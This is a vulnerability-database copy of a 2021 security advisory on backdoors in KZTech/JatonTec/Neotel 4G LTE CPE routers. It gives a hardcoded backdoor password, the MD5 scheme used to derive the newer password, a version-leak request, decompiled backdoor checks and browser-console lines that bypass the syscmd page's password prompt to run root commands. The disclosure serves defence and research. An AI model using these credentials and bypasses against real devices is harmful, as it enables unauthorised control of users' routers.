Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

KZTech / JatonTec / Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution Vulnerability

🗓️ 19 Mar 2021 00:00:00Reported by zdtType 
zdt
 zdt🔗 0day.today👁 83 Views

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution Vulnerability. The device provides high speed LAN, Wi-Fi, and VoIP integrated services to end users who need bandwidth and multi-media data service

Code
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version:  Model | Firmware
                  -------|---------
                 JT3500V | 2.0.1B1064
                 JT3300V | 2.0.1B1047
                 AM6200M | 2.0.0B3210
                 AM6000N | 2.0.0B3042
                 AM5000W | 2.0.0B3037
                 AM4200M | 2.0.0B2996
                 AM4100V | 2.0.0B2988
                AM3500MW | 2.0.0B1092
                 AM3410V | 2.0.0B1085
                 AM3300V | 2.0.0B1060
                 AM3100E | 2.0.0B981
                 AM3100V | 2.0.0B946
                 AM3000M | 2.0.0B21
                 KZ7621U | 2.0.0B14
                 KZ3220M | 2.0.0B04
                 KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: The device has several backdoors and hidden pages that
allow remote code execution, overwriting of the bootrom and
enabling debug mode.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5639
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php


03.02.2021

--


Older and newer models defer in backdoor code.
By navigating to /syscmd.html or /syscmd.asp pages
an attacker can authenticate and execute system
commands with highest privileges.

Old models (syscmd.asp) password: super1234

Newer models (syscmd.html) password: md5(WAN_MAC+version):

$ curl -k https://192.168.1.1/goform/getImgVersionInfo
{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}

...
pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
  if (*pcVar6 == 0) {
    pcVar6 = "6C:AD:EF:00:00:01";
  }
  memset(acStack280,0,0x100);
  sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
  ...
  psMd5Init(auStack112);
  psMd5Update(auStack112,local_10,local_c);
  psMd5Final(auStack112,uParm1);
  return;
...


Another 2 backdoors exist using the websCheckCookie() and specific header strings.

...
      iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
      if (iVar2 != 0) {
        return 0xffffffff;
      }
      if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
         (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"[email protected]",8), iVar2 != 0)) {
        return 0xffffffff;
        ...
        if (iVar1 != 0) goto LAB_0047c304;
LAB_0047c32c:
    WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
LAB_0047c35c:
    __n = strlen(__s1);
    if (__n == 0) {
      snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
      WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
      system(acStack1560);
      websWrite(iParm1,"invalid command!");
      goto LAB_0047c3f8;
    }
...


Bypass the backdoor password request and enable debug mode from within the web console:

$('#div_check').modal('hide');  <--- syscmd.html

g_password_check_alert.close(); <--- syscmd.asp

#  0day.today [2021-09-30]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Mar 2021 00:00Current
0.3Low risk
Vulners AI Score0.3
remote code executionlanwi-fivoipvulnerabilitybackdoorhidden pagesdebug modegoahead-webslinuxmediatekadvisoryzsl-2021-5639authenticationsystem commandsnvramdebug passwordupgrade:927useragent
83